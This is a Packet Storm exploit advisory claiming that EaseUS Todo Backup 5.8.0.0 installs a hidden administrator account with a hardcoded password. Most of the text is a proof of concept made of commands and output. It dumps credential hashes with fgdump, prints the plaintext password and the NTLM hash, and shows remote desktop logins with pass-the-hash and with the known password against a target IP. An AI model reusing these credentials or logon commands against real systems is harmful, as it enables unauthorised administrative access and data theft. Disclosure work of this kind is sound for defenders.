exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

EaseUS Todo Backup 5.8.0.0 Hardcoded Password

EaseUS Todo Backup 5.8.0.0 Hardcoded Password
Posted Mar 20, 2014
Authored by Akastep

EaseUS Todo Backup version 5.8.0.0 comes with a hardcoded administrative password that is a potential backdoor.

tags | exploit
SHA-256 | 0cc6d6d41811254e9e104cbf690cb20d99997fc1e10e662ae84fce53fa90ec43

EaseUS Todo Backup 5.8.0.0 Hardcoded Password

Change Mirror Download

Vulnerable Software:
========================================
EaseUS Todo Backup 5.8.0.0 (build 20130321)

http://oi62.tinypic.com/108i4ut.jpg
========================================
Vuln: Hardcoded Administrative Password./Potential backdoor.
========================================
Impact:
An attacker exploiting this vulnerability could assume greater privileges on a compromised system, allowing them to potentially destroy data or take control of computers for malicious purposes.
========================================
About software:

Designed for small and medium-sized businesses.
Simplify backup & recovery management to minimize server downtime and ensure business continuity
========================================
Vuln details:

EaseUS Todo Backup 5.8.0.0 (build 20130321)
(other versions may also suffer from this but not tested)

when installing it on your machine creates hidden Administrative local account on your machine with hardcoded/broken password.

But this can be abused by remote attackers as well.
Using this administrative account remote/local attacker may completely compromise target machine.




Here is few Proof of concept demonstrations:


*Before installation ("net user" command on target machine)*

C:\Users\Administrator>NET USER

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator Guest
The command completed successfully.


*After installation complete: (Notice: we've got new local administrative account in silent manner!)*

C:\Users\Administrator>NET USER

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator ETB User Guest
The command completed successfully.


C:\Users\Administrator>NET USER

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator ETB User Guest
The command completed successfully.


C:\Users\Administrator>control userpasswords2

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>fgdump.exe
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.

No parameters specified, doing a local dump. Specify -? if you are looking
elp.
--- Session ID: 2014-03-22-05-13-53 ---
Starting dump on 127.0.0.1

** Beginning local dump **
OS (127.0.0.1): Microsoft Windows Unknown Server (Build 9600) (64-bit)
Passwords dumped successfully
Cache dumped successfully

-----Summary-----

Failed servers:
NONE

Successful servers:
127.0.0.1

Total failed: 0
Total successful: 1




C:\Users\Administrator\Desktop>net user

User accounts for \\WIN-CE1QUVOKT1H

---------------------------------------------------------------------------
Administrator ETB User Guest
The command completed successfully.


C:\Users\Administrator\Desktop>net user "ETB User"
User name ETB User
Full Name ETB User
Comment For EaseUS Todo Backup Central Management Cons
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 3/21/2014 10:12:52 PM
Password expires Never
Password changeable 3/21/2014 10:12:52 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.


C:\Users\Administrator\Desktop>



C:\Users\Administrator\Desktop>type 127.0.0.1.pwdump
---------- SNIP ----------------
ETB User:1001:NO PASSWORD*********************:DE0F2B9AAEDF6BF59FED68AB06C334C2:
---------- SNIP ----------------


This hardcoded administive password filtrates in wild:

Pass: ~1EaseUs@AcsT

http://forum.insidepro.com/viewtopic.php?t=8677&start=420&sid=ed953995a5aa360b9c5be3f1472328d6




Trying to logon to this account:


Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
win-ce1quvokt1h\etb user

C:\Windows\system32>whoami /all

USER INFORMATION
----------------

User Name SID
======================== =============================================
win-ce1quvokt1h\etb user S-1-5-21-140604893-3061859077-1642753036-1001


GROUP INFORMATION
-----------------

Group Name Type S
ID Attributes
============================================================= ================ =
=========== ==================================================
Everyone Well-known group S
-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S
-1-5-114 Group used for deny only
BUILTIN\Administrators Alias S
-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S
-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S
-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S
-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S
-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S
-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S
-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S
-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S
-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S
-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled


C:\Windows\system32>exit


Testing for lovely Pass The Hash technique:
Result is successfull against Server 2012 R2



[blackhat@localhost FreeRDP]$ xfreerdp -u "ETB User" -p DE0F2B9AAEDF6BF59FED68AB06C334C2 192.168.1.103
WARNING: Using deprecated command-line interface!
-p ****** -> /p:******
-u ETB User -> /u:ETB User
192.168.1.103 -> /v:192.168.1.103
connected to 192.168.1.103:3389
Closed from X11

PIC 1:
http://oi58.tinypic.com/2z8b7t4.jpg






Or using valid and hardcoded+known credentials:

[blackhat@localhost ~]$ rdesktop -u "ETB User" -p ~1EaseUs@AcsT 192.168.1.103
Autoselected keyboard map en-us
Connection established using SSL.
WARNING: Remote desktop does not support colour depth 24; falling back to 16



PIC 2:

http://oi60.tinypic.com/2j459pk.jpg





===================== WITH LOVE FROM AZERBAIJAN ========================

packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
insecurety.net
millikuvvetler.net
b3yaz.org

Special respect's to CAMOUFL4G3 && ottoman38 and to all
Azerbaijan Black hatz,Aa team && to All Turkish hackers.

/AkaStep




Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close